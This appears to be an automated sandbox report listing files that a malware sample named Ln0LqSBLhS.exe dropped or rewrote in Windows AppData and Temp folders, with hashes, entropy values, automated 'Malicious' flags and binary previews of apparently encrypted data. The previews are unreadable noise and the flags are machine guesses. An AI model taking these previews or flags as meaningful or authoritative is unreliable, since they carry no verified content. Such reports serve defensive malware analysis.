                                                                                                                                                                                                    SHA1:DF9D2458EAA11A4F5A35F797BCD2906D259FE2F1
                                                                                                                                                                                                    SHA-256:2B6178A4372E285EC02EF3CC3A72E6FBD704EFEEC703CA36F7D20E9AAE017375
                                                                                                                                                                                                    SHA-512:53B31830F20AB6CE750C5C4588DAA7B56486227855B001D55FBDBBAF505061B0E58FE12C1EFC5B9AB9216D24C693FF386C6FB39AE3CD7FC700FFB8B2260AD618
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .U...?.|.*.$.......,.....h...D..c.z.^..}.F.B...g%..b.............ffe...Nf.V..H..f.0}.[..6.(.x.C.Xx.5.5avM-.'........,....qwf.`R.+......<2+O..=.w(..I_?...H.%-....Q.=..M.G.0.@..C....K...E9$. .@.."._.+I..J.w...r.r.-.....e...t..p...p..0.]|M..q.O.W.,As.u.H|....Zz..&N...!.XH+..i...Tt.;.,?Q.?.;+5.-.L.M....9.P.s.....~zh]\.v6xT=.=..H.8tU....$..kGZ....C..E].%...R.pa...,...........O;}......'....O..Q.E...:+.k..d(...!.|..5....PXV8t*A|..n...'T..h.W.......a.......v..]..X.y.XP:./.1.Y.=zp.|.t....D.....V...NF'p.Fi._....&q......E...y.'R[fa?e._e.=l......1.s#.....u...+.....B...0X.Vt...[.).8?..f..S......<...t.....1.M..]...<DD.?.....w0s#s+.f.....uR......B.....{?.L3Lv.....4...O2..y1...+.z..d.q...._...../T)3?W,'v.`.LB.l.$.&:R...{.......+./ .Kt.,..$.?.C.N...Z}.Ec...w.[L&u..?.T,..3b..v..T...Y....7....X.C..RG,......._..p...J.}Nsr..z.......(...-.r..f16.9`.D._.'DD2.0..;..By....+Z.. ...3......{'...../0>.M.B.c.M..lr.........8........t..W.....gJy.*.(p..P..._... .)..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977025137603275
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:3yCQdf2mRzhAs2QOnY1rZFOrqmFS1S+1iXNjYS0wfWZCpYcK7:CDf2YM4lzOrYjgXNjYSp3YcK7
                                                                                                                                                                                                    MD5:A3AE3B65A888B3A9E7690245BCEC6518
                                                                                                                                                                                                    SHA1:548A2C1BEB03968CC1FAC2D0CC37F7EB7CAE3341
                                                                                                                                                                                                    SHA-256:332922DB585536C085BA3C00773172FE8EBAA110519A7F3B096430FAA884252F
                                                                                                                                                                                                    SHA-512:401FD0403EB40ED332F37716F625577CE799A894DAC5790B7BC067076F18B8142BC0CAF6DB965FB3E53354CF6F2BA576B10425879F93AE28742EB7A8625ADDAC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ./-P3..........k......u...<....(.5.A1....j..2Q.>36c=....A-......3*..R.....A..q.6v....w`h.y].tI...<.e.....B}J..N..n.(D./8.. ".a.m.j....e.s..jW8U|..x%..l1:K...P.S.. A.3.x...^.V...."..+\..-S6.....J.$...}..o,(p..-aE......SH-=Jz...t.'.<..gE.s..P6!...-...._....sZ....9.....'......O..Yt.&.X..Q...f..n.aW..@gZ`..ehlw...R..o~9..w..?S.^{..n.v,.?x.....v..U.....Sl.Z.(.]@.M.|o....X*.~X6b..7.w0.;..>.W..J.....-..*...v......L.Q..Q*.?d..z~....E..*.|.>....7E M......apK<...v.9....)....a5.-hN..y?L|.......](h..#...EJ.;K.PS.V.....Ve.....^..1...b*..{F..^.?*[.P].23....0/H........6..m..'g...Q.?.U...F&_..sB.=i`Hb....^T-X.~s..^.^Z.l9I..6.H..r...W.b*...NH.t.v.-..e.[.hwM..b.$."..K..8q*1./... O..?........N.@2"j..|M.X..z....$.qXq.:DAp.N2.-...`..ne....T.T.RI~.v@.u(.....<.......c../LR-..$.;....b.2.7qL>...{;XA[..r."K..tY8..Of.8......d..ku..S..g.iB.&|.=%..4..Km.'|.]...++f.3....sz......C.)B.d3.......v..6...q.$\....p..5......cp....M.\..I...P..t@...r..U]C.kB.J.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9797895555939995
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EdvepEt0auldqmPybAwn6QTrTvigdwsP4IAmKcja2rBB:EdvDSauldqeNK66qgdJScfNB
                                                                                                                                                                                                    MD5:1EB58CCA1644EAFE938A688474AD8F29
                                                                                                                                                                                                    SHA1:5F66DE6DF9D8C4308748D6C591A63C87DCB7B8A4
                                                                                                                                                                                                    SHA-256:AAB9FBABA56B156A4D5BF3DE1D57052428DACF6383913A3372FD1FF567EA3D03
                                                                                                                                                                                                    SHA-512:F6A91C69F93E35F083619A31C2996F09074A652D815B8C730E16FD700D09EECE805F189D09606D4569A53BF426FBD601CCE7F1F77C5F86E1E869BE9E35E21C8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...=.9.!.......8v..!..rGI.l......IU...../.........IGO..~Z9.@...:..k..LJ.F.m8..^..VT..S|.......[.[....Z...a.(K~T."YKj.K.?..)...F..E/.e......3..>KR.m".....i[...MF.....8F.*C...../,o..sVH#...o..Ff..c+....7T.F>...s5......GE.R=.T'&7..0.]....l.A.@b........c.vz`.u^.L...."S...v.T...=F#.'.5.....E.-.%....w....L...g.....9..+..R..`,3..H...1_.(....y$.d./.y.%....uG..Z.4.<:sr..2.&6)O..^..@.....v.X.6..j....~. .c(.(Lf[..."A.L..:..j.o...^.j.U..../."..O...J#H.\......Yh......w=b.Z...H.b.lvC.8..=.-.O.Q&3....#.....1~.2*...."b]..Z..Zz....C..!..A....o..V....yMJ.*.NyW...Ds.3..k..c{....TT^..c.%r...Fn.x)...!..tvo.J.C.,....;.w\.qaX...4.).R......f.3.,...?/l..F\*..[.k.m.)..|..t....-.......$...c...w..q....lDJ.q.i.W8I .m...9.j.pWK...+.WY.m.V.y.8...;....X@.g....{...{..F.a.....2?...3... ..V...`...`..\.kNA.h5...%.............nIr..\.W......6.,c.....({.7$.....)>...+.4.k..z.F.JnJZA..G!.YM....b<g..0.j.b..s.6.^Ogz.G.... ..........^c..0.......!...?.r..dO(.K.......mtp{..(...K..xq.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.974851124938357
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:e39E+3ghB/PA7lsnKstdEZNBHWSgoBIT2V7XxehLGLL5Ewt1:+m+A/PEIJTE3NDg+PLxflN1
                                                                                                                                                                                                    MD5:C41F1CD266FE85664387588AB1CBD44B
                                                                                                                                                                                                    SHA1:D928349C1788B1945F032418B90008CB6F1FACB5
                                                                                                                                                                                                    SHA-256:12CAFDE1E808673F6E4C7EDA0B0DA16CAE247DC6D129701924D7515451AC682F
                                                                                                                                                                                                    SHA-512:0F34D6E37290594F2AE85383A2B90EEE09422FDBD94AEA6387CEB4E8C1220A035483DF1CBE881FE20A1530A0A3741C810560039B623E446B1633DEE9CCD4F535
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: i...1>..>. >......ZF.s....Uz..5.k......sZ.*.$..3.$......e.Y..!f...`.3..BH.Q|U."....}.q......x..T9~2.}.=.vD.....$...M...Ca....#Q3..W.y...+.4....a9xl....I.f.....j.e.k......X...u......'......a...D.....4O.t.*..-N...Q.).!.8w...|H-....N{.a_.L.p..8.~../Y.v._vD.C....>.qtDS..4.B......NL#N.3.l.,.......6.m..nH....9p.T.dC.&.\...i.W..i...|K.dBnW.t.L.?.w.V3u......V.A....h3f...U.A.....n..F&p..Eg..L..TP$...tx..7........^.:...(.~g....i.....;..5...4 ..yp...I...i....C..)..wD,.@.|F....#..S..v.K.....c.Q..5.B.....4.:...O.l.R...k...,q.Iu3....mK%.....B._.b.....{9....W../...?f.......{S.h.......6..~....Y..<.g.].Q.....2.0.vz`.kY...S.3!.....L.9.. ...."..eZ..n...uTG............-.&a.l.O.A..UcI8U....h..@..hHJ.c.8......u..O..'....` .H..1}....P....\.C...,O.....6s..).-.=J.....K....l..-...*...R.D.Q*..=..?.O,4.....V.../0^.....S...,..).....M.h..l0....S....z.....C.....3C.......o.JJ..F.t....L..9...6..B...&..Sy.V..$......w..|.T. _.`.v....($ia".'.f.U.o........_..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977900966776996
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5GOxV4ls5wni7lP/RZwIo0ZfwNE1oBP10kY+6zgi4:5GF899/fnKV64
                                                                                                                                                                                                    MD5:D586FE040F3576354B95085B8CD15A87
                                                                                                                                                                                                    SHA1:B8754DD69AC4CD96E599C63A9AD6C143CFA37753
                                                                                                                                                                                                    SHA-256:3F18FE4601047DA3FF747B43C7C107DCF236B6DEC73862FF3FAAC3C6795D97B5
                                                                                                                                                                                                    SHA-512:A9EB9CFB24BADEB3006EF1936AB5E11EA468033288FA4121F00FBA76198F158F782C5A8EBADF0B8AFED84E8157BABD76205932B7F5DA2FF176CB74A72BA5940A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Zw.l.Q..BJs!9s...Z.....Q-A.<.^9.../65}..%.....|D"...y..g.TE}..6.BI....ZW....]Wt.j..H..X.m.T..Ehy..<...).....Y....0^.2M~..-..6.f.%T.. .z..R..J..Q....F.h.*\iyc...*.rx...L....P...2&...{...m...0.).....bs..4v..E9..`.{J....H*.F.+.,`.Z..<}s4..1.;..Q.q.}...h.5........P..o\{b. |.Y.&xHi9h.*$..bD4b......2.YB.E..../zGS84.4G....2.%....[G..TW...@.!.N0.(..#...W.....]..$:.z....aH...G.D.....!..Z".!....-..<@:.v.o....&WT...tt..2.9...........$I..$...Y4......|N..h<6..S.{.b..=..<...jb....JU.7....V"j.j...J..t..@]\.Skb..E....\....5..W.r...Fp....u....tj..[.H...k..eN#.a.k...vfS.F.a(5{L......ewGY.m..kr.IN.;..Kn..........O.}....Df.(.jSe..&K..v...9..[).g..s.!..#.[... m....4..#.......v....e....9..p.h.v.E........z..~-..r......PW..Q.....z.T....1+...2.....,.GW.9Y.u......k.7f.....M(LS4@8..g.~.V.m...HM..}.Z..(..#lt..1..Y/....H.R.....2..@...P...*..C.lA...!&...1.T....X..Z...........H.....E/&vyh.h!....0.+$'.t..[..}.F...kn.......b.@..!.L88.Gk..v..y....x...;.Q....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977455777783246
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EJfELlLQJhq5BKxMldufD9PWSbYlRD/6lenFxj5BPpRYA8Z:hlQHQBKCvDlRDylkxtB74Z
                                                                                                                                                                                                    MD5:2122DC4CEEED54BE1C8E31939164F094
                                                                                                                                                                                                    SHA1:7844BA4B8EC975F2D81D2602265ECF5DB241E369
                                                                                                                                                                                                    SHA-256:8A5CF44B1F95536C18147BCCFFAE80384A5935E0F35B5E734B9B4C7EB0BF3A9B
                                                                                                                                                                                                    SHA-512:5C9B3BF8FB6ACC8B00E61D10AF2ABDC357AD172D7D316CCBC9581FC0406F20C08B3E45DD71214E1A5022E6611B58DC9F4AD4C9606C71F9A7BE5C60B8B60681FF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...n...Xp<.....UO..$;..J.C;..g.........F..x......2..`.~..?.x.:.F......B.,..k.Y..B.\%..n"....a..We$.%y...4....f;...o....*!.nvsP.m..1S.Q.z_oE..D;G$H.1.{(...D.....<%v6....{.|z.-..IJ..A.G... ....^..W.>.R.....-......-..Y:...].|.:AC+.da..R"`..O......-2...r+..}S.....1.s'-..k.x....J.5....:[{........~Kb.,]%..o0.0.".....7....B....oC......GG...M.n{2..^..*..=.PH...u.."..2FY...)a.P..Dre..$,7v@X.p.C. ^i|.9[..o.../..8.pa!i!d..%.0.9.5{...ep.+L...?E3...!..._..;..D.....q?.z<A@..$0....s...NN<..FO.N........sN...K.{..w|..9b..J[Q$mV.1.._<.."..._.(..{..5v........I{..C.j...>..*lRb..3.<.K '.uE.7.G\I.+.l...7.(.,.t.-...x!&.f.y....g...k[\.....K.#...C_.|...)..M.W.t.....T...h...~. ....{5{...6...%...{$..<w..Vv....K........;.....,..W...D"...Y..3..X.dw.!........?.JT.9.^uiM%.gb4Q2.h..M...|>.gz...~..+A...{...?...7...9.+F..n..)..u.R...".L...S|.#I...+.6...Ni...v.......~}).O.n.*..d....y.....6.v.]-9.RWT\.$.4#...n.{pt.`.JcC.\..8Q....7..V.|..`.w.i...}{Q.}q.)n....b...B.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975794292027528
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:MonvjXYSw6FOJvNkIaQr4GEYBIwUX82BYEbL8ge8F69/8:bvjdeP7r4GEYBIwUX82BYEPA8FV
                                                                                                                                                                                                    MD5:5226FCD10566EAF13AF135B1C59AEF57
                                                                                                                                                                                                    SHA1:66B92D559506C899AA7EF49067C6E3C1BE07DDCE
                                                                                                                                                                                                    SHA-256:CDEBE7C4E5D0232D5599F48C85CE7E55A66472D1E10B4683B14951ED3A5EE994
                                                                                                                                                                                                    SHA-512:B9C0D952936EDD509513847326944C3241AAB602F6109AC289C694EBC0A6C7EE29448694121B2648FFF16F4F5607293DB3F052102CD1AB6A34A9C7421533055A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......B....oY.........X.&pG.LL\.n...E....$..!...=...T.~...x.......>.g~_;..K..q].e.Wq..'...Q.k..$.b...(@..0qF9`......Gt^.....;..].....'....-..T..,/.m?..5.6t..QgP.-.-..<W..............uuV...v.j.......b..r...n$R[.........7....;.2..A\.....dz.^......Q...~.v4.X..>?.....V.%[...M-A.k..F.2.1.]......\....8R...TA&......i......+.ay".B..Z2.5.....Y..%.`...e....;>..a.r...LHWP..4b...[....j.P.x...Ni....R^.].g..|.A.z.....V.....u..../M....}.Dy.......6...L...F.NN...W.U.v.'.T.D6.r.";.{8.2hs.&C..R~.=........K..'...O.-.......w.W..U.".3.(..p..@.....7W..A.@......W.d...L^..9e..4...:.H..g..}'H...U......0|.^..sS....6..A.5...K..h..mX..2^.6W..1>..G.N./O-....@.5..T.~.%v;Q.l....P...Vf..ez...p.m%m.M....o[u..~/.}.Z.7.E...+K..V.`....O..%(.=2h.&'.+.2.A7..on{U..1lb........v.u.7..w....v..~K...C....."{....+..P....Ui...Y.....L..{...]..C?......A.-.J.y.f6..t..G..d:..*...m...~...#.0........fo]:..f.5...ez^.....n..`6R..~_.BP............8..&.BY..."5.T-........3.4...&....."wV...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.997047849720848
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:+sYns49MwJ8LJTbG3ltYokylRpY9s0jrUPZR/Dd9LAsbkshc:+s0mVTbG375/lnYwDLlbXhc
                                                                                                                                                                                                    MD5:B5AA56E0771144506F34AE9B5FE420F6
                                                                                                                                                                                                    SHA1:C1822CA921955225CD3962B69F74F13E2D03F884
                                                                                                                                                                                                    SHA-256:62ED2A9F44289071DC12A2A9B6C4CE66B594C513A4C8CFD562626E1B34B851D8
                                                                                                                                                                                                    SHA-512:C57D08D3F9E9B030F7349D26AB5E473E300A644E6B1CCAEC87D29DD00E6280142FA81DFCF965DDF8CEF0311CFE64F64A6D19F2CA656A4746F1B397E944420F04
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .".-p..|m.3]tj... .w6.0..xR...T6o.j...n[DZ.1D9..Ovv}..n.....j.q9......9,%a.)C.....A..:n..z)S..:......z....k...f.[\.Z.....*..t<S...BrDAp..'n..I.....x@....".|..N.....P./7A...c.3.x....^Y=....%.'D.J.............B`..P....f(......h1pT/}.N....Wf.\T...6(.....Ahx.^5..k..=v..(.b..+g!j....k.-...ImgA...M.I...z....^..U%-do...~...#.ufw.D.......@k...........B4.p0.m..."i...z&...x..y......l..m...B...F.C9.z.I+k......R U.c..>..x...E8..U.5.......(...._..,...H.../.c....1)r..w(....*.......j.7..:...4...........P...y...-...4K....Sd!.R4t....0.1..JKO`........7.l.t..b.Qd.K.O.d:...%.l*=....t.t$........]A..3..j.5..&e.2F.0..5D..>..,3....=..&.U..p+.x.E....4@7......s..<.gRz..._i.....6+...q..4:)7.e_......`.....q..c\..?%.Y.u/.................5.....n..0..}c.).Y@..{u...Hb..>@.R...x1.].k....@.@.....z..<.$.m...6..F..\.;:.e..7WyF.ht.[.=U.{<..L0.......M.....'.o.AF..,..>..3.}C.......,G...-..eo....B..@`.&.5..}.y..&WU.F..K.Y..^..l./wT+..._z.?.a...j_1dU.ez..ZHT.I.(w
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.973484763275726
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:QTBTSymltXQd8jrMZLvf5tzFGuKd+5Gyrajn3xee9K+:QhSy8Ad83M1X5tznKw5Gyejwe9K+
                                                                                                                                                                                                    MD5:1B5F74016873AD104215BB367BD02F51
                                                                                                                                                                                                    SHA1:A5D4DDBDA01C7C159327487C5DE13B16B1AD17C9
                                                                                                                                                                                                    SHA-256:7AFE8F72534BABADDBF991E6C16AE0712F5F3778E350771F570E86C910431622
                                                                                                                                                                                                    SHA-512:A2BAD73C745FA67A0933BF481C471F958B2D3BBAB0B8480FE303EE214F50246FCD28384BF38347F84A92E82462FA1B87DBCA40C7B41972000861143BA96838F0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Y.6....1..kI........n.....L.......!.'...M......X`..[.O.........w..d..aC .FvO....5k5..L......H..."..........$......@..........X..[..cit.Z..x....If....D.p&uf...<_.........'..Ef^......|=?.....&..fNmh.-..=.A1='.Z.Y@....XD.N.H.h.Q....)..w......S.)..[*i.4...E.':!..p.{_..../.Z..R[.TG.d...b.y."U.W..EB..;m>zx....<..L...2....$k.a.Lw.;.2....Y.O..........3..z.....L.E.]*.B..........R.X8....=.q.C......T.o.c.#...#..a....Y..m.E)...5.l.......].+.A.@....5'....hM...6..F.....fw..Kv.....zZ...&OD.... .y.Q2..._L.....9.f.\..k..U..4.e...y.^.)...x..._n.j.h...W....q...9Jpp.3.....5....L..L.Y^.9cw.$q._^..rT`...b.3kC|].Y.H._6.%<.t.].Z.......K....D.f..I.Z@F,.w;......mE_......D.K...*&...pL....>.r..'...do.#)m...?....QW_..M._..<J*..${&.D.Y.D........_.BAl....T..gE;))......M........A..1..m2....9X....|..cUmx..`V....=&.....L..dCr71.xdZh....)..~..ZV...z..\..+....v..IQ..c653.x1Z[..7..!...O.1R...,P.>........F.S...w....3..k0.Z.-.P7.fE..t.X}*...)..g..'%.&W..<p$.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977436487742942
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UEhigzi0qKEG0h/A21uOfeGkCzzrTX47mBdepqV:UPkLq3d1ffHTUGPV
                                                                                                                                                                                                    MD5:4D6FB04E6A12130FEEBB769D446E9695
                                                                                                                                                                                                    SHA1:C8184E54719C6C9D4CF5D2B558FD113FF34895D4
                                                                                                                                                                                                    SHA-256:68B900C952746658711DA73F86E16469541BA8DF9ADC928DE8A3C47E8F194C59
                                                                                                                                                                                                    SHA-512:7D8AC9FE39F27781BB4F890DE48DCB17FEC7833021CAB744E51D36761330CA1F66165CAAF57F3667D5DF4E92EC8D47CB1D45119A6023C19D41A437931338378C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .7..Lt`lx.q.1.3us...Y.7.....M.v.8......8..y.6..i.<,...e7.b#1....".uHnX....}x.y.....(...[.aT.&w.-.n.......K(.).U.e.......z......#...Q..l.%...z.......0..\.=..X..5....J..,E.Z.""....XH......Q..;|H4w9..P....}.d.......v^...A.g"'....s...A....u;..C. 6)...9s.:..{.Jq.....2.....".U..5'1..D.]r...,.h.*..S../.2..R...;^...h.<....I....h+!.z.%0.H....7..k......;.`...l.C.|.Vm=.V..E.;7.O{.5O..;..x.e.&^...NS.........V...K_ba....#W.&..."..CKW.ql\`..Efg..t.My..1.v.J......@..t.2PN............Q..=.x......m2.b9..r..|.[..m.R..;....1...8.)T.-...w..S.B.:.....:.u.....xh}:.R.9.s(...P.....1WX...d#..R.R..yb`.!...D...Ic..N?AS.L.=D.....s/..Pum....f#..5QP.....#.U......+.....^Te..zi/UE1....e0F........GU....y.K..........cx..Rg......r.X..."{.w.&w.[ZU...$...=h...I.<i. .m.....3.0........c.D...Y^F{(`w......,W.S3..ma..]..w\.....*.Cz...|....f.yQ...G]......g.k.n[.........zUr../.S...........H./I./.....yO..v&....%3.k..k..CrU.,..!.9='.s7u..".{.....(01.c=.-pF.g1....a...zkp.;Q.....ZK
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\AdobeARM.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4627
                                                                                                                                                                                                    Entropy (8bit):7.958351321744954
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:gdR1JjjhzoyLOXzmvRPW2Y4TMYJXWOep0Rw1cSgiZR/o67KAR9iRL:4PjhU3zmvx3TXc04cSVZKATYL
                                                                                                                                                                                                    MD5:A13807CA081EE599F1619A88E0EDAC46
                                                                                                                                                                                                    SHA1:A0932021BE538E9E46B84282786241C9615DB26E
                                                                                                                                                                                                    SHA-256:78018BD133670BD692A14F7DC67785A82DEBA39B44F12C756D96E17824272517
                                                                                                                                                                                                    SHA-512:DD76A791C6BCB8EF6F869F4CBE46369D8848729F33580A369B3450429D1D2F038C50C5F6BCA525027C0916376DA23D0C7B74242141786DB9C836583B124636D0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ~X....#.....Rf....(x....|.U....L.=.l.........*.;7+.K...s.....rRhLp.....=^.D.^.{....3h._}....\.v.#Xh...+../..y.U.K..c....2.b.....JO..^...w.J.*..? =..?....G..y....L0..........#..c..8.:..Qv.....>...,...e.....&.z...$.......T.pH`.....?4....9.v\..#W.......TI.EsP.;U.|pa.M..5...L#.|..<+.........!].'u.K..J@.6.....+.;..q.......2.P84..w.'..)i 0..<...s..u7....R..Pa}.s...29...f.`.H.M\U..c.1....}wv.;.u.f1..bJR..SV..>.O.k$.r.{.34V.Q.>u....\}.Y..%...........H...-?.* :..b...{b?..},......!....idf.....K.!...^.^.G...I.G.g.=.i.c....4....z....!.:n!..>..~..|<..t.&.-..i.mD!.....=.:G.vsYX.%Fa.Z.m.J....ik/.V...m..o...K....|.k.....6D~.m....;F..=...kXZ..rTs+$n[.%av)...|{n......Z*.I....~siq....{R.5..`..mo.08.....E\U..e...B....Q.......,8.8.}.49$......>..L.....`.H.oA.p.'f..I.;......J..4V.L.S...t...!.....1y...h&...rN..0wZ..G.....).J.1\..\.=..e.....2fo.<..Gp;<. .x.8..$ek.Vi.?.8......!.RJUO..4...K.e..z...y]..:..X......Hxk.~. ....<..L...0..t...18S..._.\w.....^...{....[".
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\CR_8F2A8.tmp\setup.exe
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998730968461879
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:UhsP7Tm6OFX99a+HgP7XVmN5zROy/ZfI6ZKuVggW8505Pb/FJNhmi/6Qq6:6A74FN8+HgPwN5syhfI6Zk8ex/FTfpB
                                                                                                                                                                                                    MD5:B6E44C01650B463ABD22C75D1D69E95A
                                                                                                                                                                                                    SHA1:529BBF46D427A9E12943C2854E1FB4C421FA27B9
                                                                                                                                                                                                    SHA-256:247E81D121C94C4B6CD6F0573E4B1111E8FC9A3D2A8FE388BDE4BDC5594722E2
                                                                                                                                                                                                    SHA-512:AAADF2DD92FF142A2BCC665FBAB845985E74820DDB3426093A82CAAA87E3802A690D38012FCF687F2B5AC8264FB8B9B8264BEE907B55037194A816B28132D90C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....j...D+.m.(?=.U..m.....Wwnp..T3#...7....L.._.3.......Cah...{..i..T..).d...P.........@.W.p.Z0h.."1Q.0.K.B9.\..yX..S...E.li...A...9{...(.+....g...[.V2..w.>......}GP...Z-....~..;.F..E.........W..D..e,'..~..W`.........*....v...%b.N..R.7-.:....s...!..7g....}UOrx.}....RHVb1n..(.T_.8...~.K..........?.?....c..~.U2.w.S..s.?x.._...T|).v..G.....L...z^;.P2ED...c....P..H......d....G.....9...[......@...&..|g;...V.=i<*N`..Y2,.*.0`+..2w.V~.Z....H.....;..|[o}.}.<9.8f.qz./.JY*....X5%dp..L....@2.A.a......*....*L#G....8.x.CA..^b8l..4.[.X..-`..+..zz).2M..4.....%..o.v%.*m,.X.qG..Z.kh...7ZSf0.2u^$P......s..D.:.FT!l.{V..o......6vca.S..r}>...^.3.#...n 6.r.oN.nw.....5`.;.A../?..y.........-_......g5...2|./.........n&1..q.6\...eS.9W..I...o.....d.......k^%..lFva,.!h'H......e...R1.....4.i..2.^..\.{+..<.h..`..`.~.~..xq....:..]..F...r.Y....p..Bt.\....Q{.....d*N......v........7..Pi...K...$>......@.........'.r.\(...M....w`^....t.vo.J....\...3N...jb.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Low\JavaDeployReg.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                    Entropy (8bit):7.399005904005575
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:U7gT/UW+amyFRG3pOQjOdxpO76KdMKnEFPplLF82cG+Niy80zYoD75dExcii96Z:Uy563gNo76KeKnclW7G+NwUacii9a
